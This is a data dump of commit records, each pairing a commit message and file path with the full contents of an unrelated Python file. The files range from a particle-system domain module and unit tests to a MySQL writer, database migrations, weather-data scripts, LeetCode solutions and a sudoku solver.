for collision. Colliding with domains can then influence particle
behavior
"""
__version__ = '$Id$'
from random import random, uniform
from math import sqrt
from particle_struct import Vec3
from _domain import Line, Plane, AABox, Sphere
class Domain(object):
"""Domain abstract base class"""
def generate(self):
"""Return a point within the domain as a 3-tuple. For domains with a
non-zero volume, 'point in domain' is guaranteed to return true.
"""
raise NotImplementedError
def __contains__(self, point):
"""Return true if point is inside the domain, false if not."""
raise NotImplementedError
def intersect(self, start_point, end_point):
"""For the line segment defined by the start and end point specified
(coordinate 3-tuples), return the point closest to the start point
where the line segment intersects surface of the domain, and the
surface normal unit vector at that point as a 2-tuple. If the line
segment does not intersect the domain, return the 2-tuple (None,
None).
Only 2 or 3 dimensional domains may be intersected.
Note performance is more important than absolute accuracy with this
method, so approximations are acceptable.
"""
raise NotImplementedError
def Box(*args, **kw):
"""Axis-aligned box domain (same as AABox for now)
WARNING: Deprecated, use AABox instead. This domain will mean something different
in future versions of lepton
"""
import warnings
warnings.warn("lepton.domain.Box is deprecated, use AABox instead. "
"This domain class will mean something different in future versions of lepton",
stacklevel=2)
return AABox(*args, **kw)
| #############################################################################
#
# Copyright (c) 2008 by Casey Duncan and contributors
# All Rights Reserved.
#
# This software is subject to the provisions of the MIT License
# A copy of the license should accompany this distribution.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
#
#############################################################################
"""Domains represent regions of space and are used for generating vectors
(positions, velocities, colors). Domains are also used by controllers to test
for collision. Colliding with domains can then influence particle
behavior
"""
__version__ = '$Id$'
from random import random, uniform
from math import sqrt
from particle_struct import Vec3
from _domain import Line, Plane, AABox, Sphere
class Domain(object):
"""Domain abstract base class"""
def generate(self):
"""Return a point within the domain as a 3-tuple. For domains with a
non-zero volume, 'point in domain' is guaranteed to return true.
"""
raise NotImplementedError
def __contains__(self, point):
"""Return true if point is inside the domain, false if not."""
raise NotImplementedError
def intersect(self, start_point, end_point):
"""For the line segment defined by the start and end point specified
(coordinate 3-tuples), return the point closest to the start point
where the line segment intersects surface of the domain, and the
surface normal unit vector at that point as a 2-tuple. If the line
segment does not intersect the domain, return the 2-tuple (None,
None).
Only 2 or 3 dimensional domains may be intersected.
Note performance is more important than absolute accuracy with this
method, so approximations are acceptable.
"""
raise NotImplementedError
| Python | 0 |
03fdc41437f96cb1d6ba636c3a5d8c5dc15430b1 | Create requirements.py | requirements.py | requirements.py | Python | 0 | ||
ab99f855f708dec213c9eea1489643c01526e0b0 | Add unittests for bridgedb.parse.versions module. | lib/bridgedb/test/test_parse_versions.py | lib/bridgedb/test/test_parse_versions.py | # -*- coding: utf-8 -*-
#_____________________________________________________________________________
#
# This file is part of BridgeDB, a Tor bridge distribution system.
#
# :authors: Isis Lovecruft 0xA3ADB67A2CDB8B35 <isis@torproject.org>
# please also see AUTHORS file
# :copyright: (c) 2014, The Tor Project, Inc.
# (c) 2014, Isis Lovecruft
# :license: see LICENSE for licensing information
#_____________________________________________________________________________
"""Unittests for :mod:`bridgedb.parse.versions`."""
from __future__ import print_function
from twisted.trial import unittest
from bridgedb.parse import versions
class ParseVersionTests(unittest.TestCase):
"""Unitests for :class:`bridgedb.parse.versions.Version`."""
def test_Version_with_bad_delimiter(self):
"""Test parsing a version number which uses '-' as a delimiter."""
self.assertRaises(versions.InvalidVersionStringFormat,
versions.Version, '2-6-0', package='tor')
def test_Version_really_long_version_string(self):
"""Parsing a version number which is way too long should raise
an IndexError which is ignored.
"""
v = versions.Version('2.6.0.0.beta', package='tor')
self.assertEqual(v.prerelease, 'beta')
self.assertEqual(v.major, 6)
def test_Version_string(self):
"""Test converting a valid Version object into string form."""
v = versions.Version('0.2.5.4', package='tor')
self.assertEqual(v.base(), '0.2.5.4')
| Python | 0 | |
caef0059d803fc885d268ccd66b9c70a0b2ab129 | Create Exercise4_VariablesAndNames.py | Exercise4_VariablesAndNames.py | Exercise4_VariablesAndNames.py | # Exercise 4 : Variables and Names
cars = 100
space_in_a_car = 4.0
drivers = 30
passengers = 90
cars_not_driven = cars - drivers
cars_driven = drivers
carpool_capacity = cars_driven * space_in_a_car
average_passengers_per_cars = passengers / cars_driven
print("There are", cars, "cars available.")
print("There are only", drivers, "drivers available.")
print("There will be", cars_not_driven, "empty cars today.")
print("We can transport", carpool_capacity, "people today.")
print("We have", passengers, "to carpool today.")
print("We need to put about", average_passengers_per_cars, "in each car.")
| Python | 0 | |
7b00bbb576df647a74b47b601beff02af308d16a | 添加 输出到 MySQL | src/target/mysql.py | src/target/mysql.py | # -*- coding: utf-8 -*-
# Author: mojiehua
# Email: mojh@ibbd.net
# Created Time: 2017-07-18 17:38:44
import pymysql
class Target:
"""
写入 MySQL 数据库,需要预先创建表,字段应与输出的字段一致
支持的配置参数 params 如下:
host: MySQL 主机地址
port: MySQL 端口(可选参数,默认3306)
user: 用户名
passwd: 密码
db: 数据库
table: 表名
charset: 字符集(可选参数,默认设置成UTF8)
配置示例
params:
host: 127.0.0.1
port: 3306
user: root
passwd: root
db: test
charset: utf8
table: testmysql
batch: true
batchNum: 1000
"""
params = {}
def __init__(self, params):
params['charset'] = params['charset'] if 'charset' in params else 'utf8'
params['port'] = int(params['port']) if 'port' in params else 3306
self.params = params
self._host = params['host']
self._port = params['port']
self._user = params['user']
self._passwd = params['passwd']
self._db = params['db']
self._charset = params['charset']
self._table = params['table']
self._conn = None
self._cursor = None
def get_conn(self):
try:
conn = pymysql.connect(host = self._host,
port = self._port,
user = self._user,
passwd = self._passwd,
db = self._db,
charset = self._charset)
return conn
except Exception as e:
print('数据库连接出错',e)
raise e
def write(self, row):
if self._conn is None:
self._conn = self.get_conn()
self._cursor = self._conn.cursor()
sql = self.constructSQLByRow(row)
try:
self._cursor.execute(sql,(list(row.values())))
self._conn.commit()
except Exception as e:
print(e)
print('插入数据库出错,忽略此条记录',row)
def constructSQLByRow(self,row):
fields = ','.join(row.keys())
values = ','.join(['%s' for _ in row.values()])
sql = '''INSERT INTO {tb}({column}) VALUES ({values}) '''.format(tb=self._table,column=fields,values=values)
return sql
def batch(self, rows):
if self._conn is None:
self._conn = self.get_conn()
self._cursor = self._conn.cursor()
for row in rows:
try:
sql = self.constructSQLByRow(row)
self._cursor.execute(sql,(list(row.values())))
except Exception as e:
print(e)
print('插入数据库出错,忽略此条记录',row)
self._conn.commit()
def __del__(self):
if self._cursor:
self._cursor.close()
if self._conn:
self._conn.close()
| Python | 0.000001 | |
1a4db50c848a3e7bb1323ae9e6b26c884187c575 | Add my fibonacci sequence homework. | training/level-1-the-zen-of-python/dragon-warrior/fibonacci/rwharris-nd_fibonacci.py | training/level-1-the-zen-of-python/dragon-warrior/fibonacci/rwharris-nd_fibonacci.py | def even_fibonacci_sum(a:int,b:int,max:int) -> int:
temp = 0
sum = 0
while (b <= max):
if (b%2 == 0):
sum += b
temp = a + b
a = b
b = temp
print(sum)
even_fibonacci_sum(1,2,4000000) | Python | 0.000003 | |
f14c483283984b793f1209255e059d7b9deb414c | Add in the db migration | migrations/versions/8081a5906af_.py | migrations/versions/8081a5906af_.py | """empty message
Revision ID: 8081a5906af
Revises: 575d8824e34c
Create Date: 2015-08-25 18:04:56.738898
"""
# revision identifiers, used by Alembic.
revision = '8081a5906af'
down_revision = '575d8824e34c'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('organization', sa.Column('member_count', sa.Integer(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('organization', 'member_count')
### end Alembic commands ###
| Python | 0.000001 | |
2dff474fe7723ebc7d7559fc77791924532d58db | reorder imports for pep8 | boltons/timeutils.py | boltons/timeutils.py | # -*- coding: utf-8 -*-
import bisect
import datetime
from datetime import timedelta
from strutils import cardinalize
def total_seconds(td):
"""\
A pure-Python implementation of Python 2.7's timedelta.total_seconds().
Accepts a timedelta object, returns number of total seconds.
>>> td = datetime.timedelta(days=4, seconds=33)
>>> total_seconds(td)
345633.0
"""
a_milli = 1000000.0
td_ds = td.seconds + (td.days * 86400) # 24 * 60 * 60
td_micro = td.microseconds + (td_ds * a_milli)
return td_micro / a_milli
_BOUNDS = [(0, timedelta(seconds=1), 'second'),
(1, timedelta(seconds=60), 'minute'),
(1, timedelta(seconds=3600), 'hour'),
(1, timedelta(days=1), 'day'),
(1, timedelta(days=7), 'week'),
(2, timedelta(days=30), 'month'),
(1, timedelta(days=365), 'year')]
_BOUNDS = [(b[0] * b[1], b[1], b[2]) for b in _BOUNDS]
_BOUND_DELTAS = [b[0] for b in _BOUNDS]
def decimal_relative_time(d, other=None, ndigits=0):
"""\
>>> now = datetime.datetime.utcnow()
>>> decimal_relative_time(now - timedelta(days=1, seconds=3600), now)
(1.0, 'day')
>>> decimal_relative_time(now - timedelta(seconds=0.002), now, ndigits=5)
(0.002, 'seconds')
>>> '%g %s' % _
'0.002 seconds'
"""
if other is None:
other = datetime.datetime.utcnow()
diff = other - d
diff_seconds = total_seconds(diff)
abs_diff = abs(diff)
b_idx = bisect.bisect(_BOUND_DELTAS, abs_diff) - 1
bbound, bunit, bname = _BOUNDS[b_idx]
#f_diff, f_mod = divmod(diff_seconds, total_seconds(bunit))
f_diff = diff_seconds / total_seconds(bunit)
rounded_diff = round(f_diff, ndigits)
return rounded_diff, cardinalize(bname, abs(rounded_diff))
def relative_time(d, other=None, ndigits=0):
"""\
>>> now = datetime.datetime.utcnow()
>>> relative_time(now, ndigits=1)
'0 seconds ago'
>>> relative_time(now - timedelta(days=1, seconds=36000), ndigits=1)
'1.4 days ago'
>>> relative_time(now + timedelta(days=7), now, ndigits=1)
'1 week from now'
"""
drt, unit = decimal_relative_time(d, other, ndigits)
phrase = 'ago'
if drt < 0:
phrase = 'from now'
return '%g %s %s' % (abs(drt), unit, phrase)
| # -*- coding: utf-8 -*-
import datetime
from datetime import timedelta
from strutils import cardinalize
def total_seconds(td):
"""\
A pure-Python implementation of Python 2.7's timedelta.total_seconds().
Accepts a timedelta object, returns number of total seconds.
>>> td = datetime.timedelta(days=4, seconds=33)
>>> total_seconds(td)
345633.0
"""
a_milli = 1000000.0
td_ds = td.seconds + (td.days * 86400) # 24 * 60 * 60
td_micro = td.microseconds + (td_ds * a_milli)
return td_micro / a_milli
import bisect
_BOUNDS = [(0, timedelta(seconds=1), 'second'),
(1, timedelta(seconds=60), 'minute'),
(1, timedelta(seconds=3600), 'hour'),
(1, timedelta(days=1), 'day'),
(1, timedelta(days=7), 'week'),
(2, timedelta(days=30), 'month'),
(1, timedelta(days=365), 'year')]
_BOUNDS = [(b[0] * b[1], b[1], b[2]) for b in _BOUNDS]
_BOUND_DELTAS = [b[0] for b in _BOUNDS]
def decimal_relative_time(d, other=None, ndigits=0):
"""\
>>> now = datetime.datetime.utcnow()
>>> decimal_relative_time(now - timedelta(days=1, seconds=3600), now)
(1.0, 'day')
>>> decimal_relative_time(now - timedelta(seconds=0.002), now, ndigits=5)
(0.002, 'seconds')
>>> '%g %s' % _
'0.002 seconds'
"""
if other is None:
other = datetime.datetime.utcnow()
diff = other - d
diff_seconds = total_seconds(diff)
abs_diff = abs(diff)
b_idx = bisect.bisect(_BOUND_DELTAS, abs_diff) - 1
bbound, bunit, bname = _BOUNDS[b_idx]
#f_diff, f_mod = divmod(diff_seconds, total_seconds(bunit))
f_diff = diff_seconds / total_seconds(bunit)
rounded_diff = round(f_diff, ndigits)
return rounded_diff, cardinalize(bname, abs(rounded_diff))
def relative_time(d, other=None, ndigits=0):
"""\
>>> now = datetime.datetime.utcnow()
>>> relative_time(now, ndigits=1)
'0 seconds ago'
>>> relative_time(now - timedelta(days=1, seconds=36000), ndigits=1)
'1.4 days ago'
>>> relative_time(now + timedelta(days=7), now, ndigits=1)
'1 week from now'
"""
drt, unit = decimal_relative_time(d, other, ndigits)
phrase = 'ago'
if drt < 0:
phrase = 'from now'
return '%g %s %s' % (abs(drt), unit, phrase)
| Python | 0 |
c86835059c6fcc657290382e743922b14e7e7656 | add server | server.py | server.py | from flask import Flask, request
app = Flask(__name__)
@app.route('/')
def root():
print(request.json)
return "hi"
if __name__ == '__main__':
app.run(debug=True, port=5000)
| Python | 0.000001 | |
a4bc16a375dc30e37034993bd07d3014f3b936e1 | Fix corrupt abstract field data | migrations/versions/201610041721_8b5ab7da2d5_fix_corrupt_abstract_field_data.py | migrations/versions/201610041721_8b5ab7da2d5_fix_corrupt_abstract_field_data.py | """Fix corrupt abstract field data
Revision ID: 8b5ab7da2d5
Revises: 52d970fb6a74
Create Date: 2016-10-04 17:21:19.186125
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = '8b5ab7da2d5'
down_revision = '52d970fb6a74'
def upgrade():
# We don't want any dicts in abstract field values...
# Single choice fields with no value should be `null`, text fields should be empty
op.execute('''
UPDATE event_abstracts.abstract_field_values fv
SET data = 'null'::json
FROM events.contribution_fields cf
WHERE data::jsonb = '{}'::jsonb AND cf.id = fv.contribution_field_id AND cf.field_type = 'single_choice';
UPDATE event_abstracts.abstract_field_values fv
SET data = '""'::json
FROM events.contribution_fields cf
WHERE data::jsonb = '{}'::jsonb AND cf.id = fv.contribution_field_id AND cf.field_type = 'text';
''')
def downgrade():
pass
| Python | 0.000414 | |
402911310eee757a0dd238466f11477c98c0748b | Add NARR solar radiation point sampler | scripts/coop/narr_solarrad.py | scripts/coop/narr_solarrad.py | """
Sample the NARR solar radiation analysis into estimated values for the
COOP point archive
1 langley is 41840.00 J m-2 is 41840.00 W s m-2 is 11.622 W hr m-2
So 1000 W m-2 x 3600 is 3,600,000 W s m-2 is 86 langleys
"""
import netCDF4
import datetime
import pyproj
import numpy
import iemdb
import sys
COOP = iemdb.connect('coop', bypass=True)
ccursor = COOP.cursor()
ccursor2 = COOP.cursor()
P4326 = pyproj.Proj(init="epsg:4326")
LCC = pyproj.Proj("+lon_0=-107.0 +y_0=0.0 +R=6367470.21484 +proj=lcc +x_0=0.0 +units=m +lat_2=50.0 +lat_1=50.0 +lat_0=50.0")
def get_gp(xc, yc, x, y):
""" Return the grid point closest to this point """
distance = []
xidx = (numpy.abs(xc-x)).argmin()
yidx = (numpy.abs(yc-y)).argmin()
dx = x - xc[xidx]
dy = y - yc[yidx]
movex = -1
if dx >= 0:
movex = 1
movey = -1
if dy >= 0:
movey = 1
gridx = [xidx, xidx+movex, xidx+movex, xidx]
gridy = [yidx, yidx, yidx+movey, yidx+movey]
for myx, myy in zip(gridx, gridy):
d = ((y - yc[myy])**2 + (x - xc[myx])**2)**0.5
distance.append( d )
return gridx, gridy, distance
def do( date ):
""" Process for a given date
6z file has 6z to 9z data
"""
sts = date.replace(hour=6) # 6z
ets = sts + datetime.timedelta(days=1)
now = sts
interval = datetime.timedelta(hours=3)
while now < ets:
fn = now.strftime("/mesonet/ARCHIVE/data/%Y/%m/%d/model/NARR/"+
"rad_%Y%m%d%H00.nc")
nc = netCDF4.Dataset( fn )
rad = nc.variables['Downward_shortwave_radiation_flux'][0,:,:]
if now == sts:
xc = nc.variables['x'][:] * 1000.0 # convert to meters
yc = nc.variables['y'][:] * 1000.0 # convert to meters
total = rad * 10800.0 # 3 hr rad to total rad
else:
total += (rad * 10800.0)
nc.close()
now += interval
ccursor.execute("""
SELECT station, x(geom), y(geom) from alldata a JOIN stations t on
(a.station = t.id) where day = %s
""", (date.strftime("%Y-%m-%d"), ))
for row in ccursor:
(x,y) = pyproj.transform(P4326, LCC, row[1], row[2])
(gridxs, gridys, distances) = get_gp(xc, yc, x, y)
z0 = total[gridys[0], gridxs[0]]
z1 = total[gridys[1], gridxs[1]]
z2 = total[gridys[2], gridxs[2]]
z3 = total[gridys[3], gridxs[3]]
val = ((z0/distances[0] + z1/distances[1] + z2/distances[2]
+ z3/distances[3]) / (1./distances[0] + 1./distances[1] +
1./distances[2] + 1./distances[3] ))
langleys = val / 41840.0
if langleys < 0:
print 'WHOA! Negative RAD: %.2f, station: %s' % (langleys, row[0])
continue
ccursor2.execute("""
UPDATE alldata_"""+ row[0][:2] +""" SET narr_srad = %s WHERE
day = %s and station = %s
""", (langleys, date.strftime("%Y-%m-%d"), row[0]))
do( datetime.datetime(int(sys.argv[1]), int(sys.argv[2]), int(sys.argv[3])) )
ccursor2.close()
COOP.commit()
COOP.close() | Python | 0 | |
e4e572925e987fba59c3421a80d9bc247e04026d | add scraper of NDBC metadata | scripts/dbutil/scrape_ndbc.py | scripts/dbutil/scrape_ndbc.py | """See if we can get metadata dynmically from NDBC
var currentstnlat = 29.789;
var currentstnlng = -90.42;
var currentstnname = '8762482 - West Bank 1, Bayou Gauche, LA';
<b>Site elevation:</b> sea level<br />
"""
import requests
import psycopg2
from pyiem.reference import nwsli2country, nwsli2state
OUTPUT = open('insert.sql', 'w')
def compute_network(nwsli):
country = nwsli2country.get(nwsli[3:])
state = nwsli2state.get(nwsli[3:])
if country == 'US' and state is not None:
return "US", state, "%s_DCP" % (state,)
if country != 'US' and state is not None:
return country, state, "%s_%s_DCP" % (country, state)
print(("Failure to compute state for nwsli: %s [country:%s, state:%s]"
) % (nwsli, country, state))
return None, None, None
def do(nwsli):
uri = "http://www.ndbc.noaa.gov/station_page.php?station=%s" % (nwsli,)
req = requests.get(uri)
if req.status_code != 200:
print("do(%s) failed with status code: %s" % (nwsli, req.status_code))
return
html = req.content
meta = {'elevation': -999}
for line in html.split("\n"):
if line.strip().startswith("var currentstn"):
tokens = line.strip().split()
meta[tokens[1]] = " ".join(tokens[3:]).replace(
'"', "").replace(";", "").replace("'", "")
if line.find("<b>Site elevation:</b>") > -1:
elev = line.strip().replace(
"<b>Site elevation:</b>",
"").replace("<br />", "").replace("above mean sea level",
"").strip()
meta['elevation'] = (float(elev.replace("m", ""))
if elev != 'sea level' else 0)
if 'currentstnlng' not in meta:
print("Failure to scrape: %s" % (nwsli,))
return
tokens = meta['currentstnname'].split("-")
name = "%s - %s" % (tokens[1].strip(), tokens[0].strip())
country, state, network = compute_network(nwsli)
if network is None:
return
lon = float(meta['currentstnlng'])
lat = float(meta['currentstnlat'])
sql = """INSERT into stations(id, name, network, country, state,
plot_name, elevation, online, metasite, geom) VALUES ('%s', '%s', '%s',
'%s', '%s', '%s', %s, 't', 'f', 'SRID=4326;POINT(%s %s)');
""" % (nwsli, name, network, country, state, name, meta['elevation'], lon,
lat)
OUTPUT.write(sql)
def main():
pgconn = psycopg2.connect(database='hads', host='iemdb', user='nobody')
cursor = pgconn.cursor()
cursor.execute("""SELECT distinct nwsli from unknown where
product ~* 'OSO' ORDER by nwsli""")
for row in cursor:
do(row[0])
OUTPUT.close()
if __name__ == '__main__':
main()
| Python | 0 | |
ef745ed086ebd8e77e158c89b577c77296630320 | Add solution for 118 pascals triangle | Python/118_Pascals_Triangle.py | Python/118_Pascals_Triangle.py | class Solution(object):
def generate(self, numRows):
"""
:type numRows: int
:rtype: List[List[int]]
"""
res = [[1],[1,1]]
if numRows == 0:
return []
elif numRows == 1:
return [[1]]
else:
old = [1,1]
for i in xrange(numRows-2):
temp = [1]
for j in xrange(len(old)-1):
temp.append(old[j]+old[j+1])
temp.append(1)
res.append(temp)
old = temp
return res
if __name__ == '__main__':
print Solution().generate(6)
| Python | 0.000864 | |
af7abc0fc476f7c048790fc8b378ac1af8ae8b33 | Create top-k-frequent-words.py | Python/top-k-frequent-words.py | Python/top-k-frequent-words.py | # Time: O(n + klogk) on average
# Space: O(n)
# Given a non-empty list of words, return the k most frequent elements.
#
# Your answer should be sorted by frequency from highest to lowest.
# If two words have the same frequency, then the word with the lower alphabetical order comes first.
#
# Example 1:
# Input: ["i", "love", "leetcode", "i", "love", "coding"], k = 2
# Output: ["i", "love"]
# Explanation: "i" and "love" are the two most frequent words.
# Note that "i" comes before "love" due to a lower alphabetical order.
# Example 2:
# Input: ["the", "day", "is", "sunny", "the", "the", "the", "sunny", "is", "is"], k = 4
# Output: ["the", "is", "sunny", "day"]
# Explanation: "the", "is", "sunny" and "day" are the four most frequent words,
# with the number of occurrence being 4, 3, 2 and 1 respectively.
# Note:
# You may assume k is always valid, 1 ≤ k ≤ number of unique elements.
# Input words contain only lowercase letters.
#
# Follow up:
# Try to solve it in O(n log k) time and O(n) extra space.
# Can you solve it in O(n) time with only O(k) extra space?
from random import randint
class Solution(object):
def topKFrequent(self, words, k):
"""
:type words: List[str]
:type k: int
:rtype: List[str]
"""
counts = collections.defaultdict(int)
for i in words:
counts[i] += 1
p = []
for key, val in counts.iteritems():
p.append((-val, key))
self.kthElement(p, k);
result = []
sorted_p = sorted(p[:k])
print sorted_p
for i in xrange(k):
result.append(sorted_p[i][1])
return result
def kthElement(self, nums, k): # O(n) on average
def PartitionAroundPivot(left, right, pivot_idx, nums):
pivot_value = nums[pivot_idx]
new_pivot_idx = left
nums[pivot_idx], nums[right] = nums[right], nums[pivot_idx]
for i in xrange(left, right):
if nums[i] < pivot_value:
nums[i], nums[new_pivot_idx] = nums[new_pivot_idx], nums[i]
new_pivot_idx += 1
nums[right], nums[new_pivot_idx] = nums[new_pivot_idx], nums[right]
return new_pivot_idx
left, right = 0, len(nums) - 1
while left <= right:
pivot_idx = randint(left, right)
new_pivot_idx = PartitionAroundPivot(left, right, pivot_idx, nums)
if new_pivot_idx == k - 1:
return
elif new_pivot_idx > k - 1:
right = new_pivot_idx - 1
else: # new_pivot_idx < k - 1.
left = new_pivot_idx + 1
| Python | 0.999054 | |
60841e5b5a5f7e89c986fa202633ccf1a0f35315 | Add main module | src/validator.py | src/validator.py | # -*- coding: utf-8 -*-
#
# This module is part of the GeoTag-X project validator tool.
#
# Author: Jeremy Othieno (j.othieno@gmail.com)
#
# Copyright (c) 2016 UNITAR/UNOSAT
#
# The MIT License (MIT)
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
def main():
"""Executes the application.
"""
import sys
parser = _get_argparser()
return run(parser.parse_args(sys.argv[1:]))
def run(arguments):
"""Executes the application with the specified command-line arguments.
Args:
arguments (list): A list of command-line argument strings.
"""
raise NotImplementedError()
def _version():
"""Returns the tool's version string.
"""
from __init__ import __version__
return "GeoTag-X Project Validator v%s, Copyright (C) 2016 UNITAR/UNOSAT." % __version__
def _get_argparser():
"""Constructs the application's command-line argument parser.
Returns:
argparse.ArgumentParser: A command-line argument parser instance.
"""
raise NotImplementedError()
| Python | 0.000001 | |
344ee4f5aafa19271a428d171f14b52d26a3f588 | Create solver.py | solver.py | solver.py | from models import Table
from utils import sector_counter, clearscreen
#start with blank screen
clearscreen()
# building the blank sudoku table
sudoku = Table()
# Having the user enter the sudoku puzzle
sudoku.get_table()
print("This is your sudoku puzzle:")
print(sudoku)
num = 1
row = 0
col = 0
counter = 0
max_tries = 1000
# This will loop through while the puzzle isn't solved, or until it's reached the maximum tries.
while sudoku.puzzle_has_blanks() and counter < max_tries:
for num in range(10):
# this will cause it to iterate through the sectors in the grid
for sector_id in range(9):
#setting the number of flagged/possible spots to 0
sudoku.flagged_spots = 0
# the massive if statements that looks at a box in the puzzle to determine if those things are all true.
for number_in_block,row,col in sudoku.iter_sector(sector_id):
if (sudoku.current_box_is_blank(row,col)
and sudoku.num_is_not_in_sector(row, col, num)
and sudoku.num_is_not_in_row(row, col, num)
and sudoku.num_is_not_in_col(row, col, num)):
# if all are true, it flags that spot as a possible solution, and records it.
sudoku.flagged_spots += 1
sudoku.flag_num = num
sudoku.flag_row = row
sudoku.flag_col = col
number_that_was_in_block = number_in_block
# print("I'm flagging {},{}, for number: {} which is in sector {}, and this is the {} flag.".format(row,col,num,sector_id,sudoku.flagged_spots))
# prior to going to the next number, if only one flag has been created in the section, the spot must be good, so it updates the table.
if sudoku.flagged_spots == 1:
sudoku.table[sudoku.flag_row][sudoku.flag_col] = sudoku.flag_num
print("Putting {} in sector {} at {} row {} col.".format(num, sector_id+1, sudoku.flag_row+1, sudoku.flag_col+1))
counter +=1
if counter == max_tries:
print ("The solver took {} passes at it, and this is the best if could do:".format(counter))
else:
print("Here is your solved puzzle! It took {} passes.".format(counter))
print(sudoku)
| Python | 0 | |
8752c36c89e3b2a6b012761d1b24183391245fea | Create Node.py | service/Node.py | service/Node.py | #########################################
# Node.py
# description: embedded node js
# categories: [programming]
# possibly more info @: http://myrobotlab.org/service/Node
#########################################
# start the service
node = Runtime.start("node","Node")
| Python | 0.000003 | |
3874a618fa30787b48578430d8abcdc29549102d | solve problem no.1991 | 01xxx/1991/answer.py | 01xxx/1991/answer.py | from typing import Dict
class Node:
def __init__(self, value):
self.value: str = value
self.left: Node = None
self.right: Node = None
def preorder_traversal(self):
print(self.value, end='')
if self.left:
self.left.preorder_traversal()
if self.right:
self.right.preorder_traversal()
def inorder_traversal(self):
if self.left:
self.left.inorder_traversal()
print(self.value, end='')
if self.right:
self.right.inorder_traversal()
def postorder_traversal(self):
if self.left:
self.left.postorder_traversal()
if self.right:
self.right.postorder_traversal()
print(self.value, end='')
Nodes: Dict[str, Node] = {}
N: int = int(input())
value:str
left:str
right:str
for _ in range(N):
value, left, right = input().split()
if value not in Nodes:
Nodes[value] = Node(value)
if left != '.':
if left not in Nodes:
Nodes[left] = Node(left)
Nodes[value].left = Nodes[left]
if right != '.':
if right not in Nodes:
Nodes[right] = Node(right)
Nodes[value].right = Nodes[right]
Nodes['A'].preorder_traversal()
print()
Nodes['A'].inorder_traversal()
print()
Nodes['A'].postorder_traversal() | Python | 0.017639 | |
f77b45b06f88912d154a5fd5b04d69780618110b | Fix migration [WAL-616] | src/nodeconductor_openstack/openstack_tenant/migrations/0024_add_backup_size.py | src/nodeconductor_openstack/openstack_tenant/migrations/0024_add_backup_size.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
from nodeconductor_openstack.openstack_tenant.models import Backup
def add_backup_size_to_metadata(apps, schema_editor):
for backup in Backup.objects.iterator():
backup.metadata['size'] = backup.instance.size
backup.save()
class Migration(migrations.Migration):
dependencies = [
('openstack_tenant', '0023_remove_instance_external_ip'),
]
operations = [
migrations.RunPython(add_backup_size_to_metadata),
]
| Python | 0 | |
41d6401780b63a6d835ad48a40df183d6748c99a | add moe plotter utility | smt/extensions/moe_plotter.py | smt/extensions/moe_plotter.py | import six
import numpy as np
from matplotlib import colors
import matplotlib.pyplot as plt
class MOEPlotter(object):
def __init__(self, moe, xlimits):
self.moe = moe
self.xlimits = xlimits
################################################################################
def plot_cluster(self, x_, y_):
"""
Plot distribsian cluster
Parameters:
-----------
xlimits: array_like
array[ndim, 2]
x_: array_like
Input training samples
y_: array_like
Output training samples
Optionnals:
-----------
heaviside: float
Heaviside factor. Default to False
"""
GMM=self.moe.cluster
xlim = self.xlimits
if GMM.n_components > 1:
colors_ = list(six.iteritems(colors.cnames))
dim = xlim.shape[0]
weight = GMM.weights_
mean = GMM.means_
cov = GMM.covars_
prob_ = self.moe._proba_cluster(x_)
sort = np.apply_along_axis(np.argmax, 1, prob_)
if dim == 1:
fig = plt.figure()
x = np.linspace(xlim[0, 0], xlim[0, 1])
prob = self.moe._proba_cluster(x)
for i in range(len(weight)):
plt.plot(x, prob[:, i], ls='--')
plt.xlabel('Input Values')
plt.ylabel('Membership probabilities')
plt.title('Cluster Map')
fig = plt.figure()
for i in range(len(sort)):
color_ind = int(((len(colors_) - 1) / sort.max()) * sort[i])
color = colors_[color_ind][0]
plt.plot(x_[i], y_[i], c=color, marker='o')
plt.xlabel('Input Values')
plt.ylabel('Output Values')
plt.title('Samples with clusters')
if dim == 2:
x0 = np.linspace(xlim[0, 0], xlim[0, 1], 20)
x1 = np.linspace(xlim[1, 0], xlim[1, 1], 20)
xv, yv = np.meshgrid(x0, x1)
x = np.array(zip(xv.reshape((-1,)), yv.reshape((-1,))))
prob = self.moe._proba_cluster(x)
fig = plt.figure()
ax1 = fig.add_subplot(111, projection='3d')
for i in range(len(weight)):
color = colors_[int(((len(colors_) - 1) / len(weight)) * i)][0]
ax1.plot_trisurf(x[:, 0], x[:, 1], prob[:, i], alpha=0.4, linewidth=0,
color=color)
plt.title('Cluster Map 3D')
fig1 = plt.figure()
for i in range(len(weight)):
color = colors_[int(((len(colors_) - 1) / len(weight)) * i)][0]
plt.tricontour(x[:, 0], x[:, 1], prob[:, i], 1, colors=color, linewidths=3)
plt.title('Cluster Map 2D')
fig = plt.figure()
ax2 = fig.add_subplot(111, projection='3d')
for i in range(len(sort)):
color = colors_[int(((len(colors_) - 1) / sort.max()) * sort[i])][0]
ax2.scatter(x_[i][0], x_[i][1], y_[i], c=color)
plt.title('Samples with clusters')
plt.show()
| Python | 0 | |
